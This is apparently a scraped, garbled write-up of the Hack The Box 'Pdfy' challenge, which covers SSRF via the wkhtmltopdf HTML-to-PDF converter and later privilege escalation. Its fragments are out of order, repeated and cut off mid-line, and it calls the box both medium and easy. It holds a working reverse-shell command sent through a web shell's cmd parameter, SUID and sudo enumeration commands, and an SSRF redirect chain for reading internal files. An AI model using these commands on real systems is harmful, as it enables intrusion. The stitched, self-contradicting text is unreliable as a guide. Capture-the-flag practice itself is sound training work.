Pdfy Htb Writeup Upd <WORKING — 2024>

"url": "https://example.com"

Trigger a reverse shell: http://10.10.10.x/shell.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.x.x/4444 0>&1' We are now on the box as the www-data user. 5. Privilege Escalation: Root Access With low-level access, we need to escalate to root. Enumerating Local Privileges We check for SUID binaries, sudo rights, or cron jobs. sudo -l find / -perm -u=s -type f 2>/dev/null Use code with caution. Exploit: System Service/Cron Job

Result: obtain user shell (user.txt).

Pdfy is a medium-level difficulty box on Hack The Box (HTB), an online platform for cybersecurity enthusiasts to practice their skills in a legal and safe environment. The goal of this writeup is to provide a detailed walkthrough of how to exploit the Pdfy box and gain root access.

su newuser

By experimenting with the input fields, we determine the server uses a backend tool like wkhtmltopdf or a similar HTML-to-PDF converter. Testing for Command Injection/File Read

Our goal is to escalate privileges to the root user. After analyzing the system, we discover that the pdfy user has a cron job configured to run a script ( /usr/local/bin/pdf2txt ) periodically. The script seems to be a Python executable. pdfy htb writeup upd

[Attacker Node] ---> (Submits Malicious URL) ---> [PDFy Web Server] ---> (Fetches Page via wkhtmltopdf) ---> [Attacker's Exploitation Server (302 Redirect)] ---> [Internal System Files (file:///)]

: It takes that URL, visits it, and converts the webpage's contents into a downloadable PDF file. "url": "https://example

The challenge on Hack The Box (HTB) is an easy-rated web challenge focusing on Server-Side Request Forgery (SSRF) and exploiting vulnerable third-party components—specifically the HTML-to-PDF engine wkhtmltopdf .

This updated write‑up covers the core vulnerability (an SSRF in wkhtmltopdf ), two practical attack strategies, and a step‑by‑step walkthrough to capture the flag. Enumerating Local Privileges We check for SUID binaries,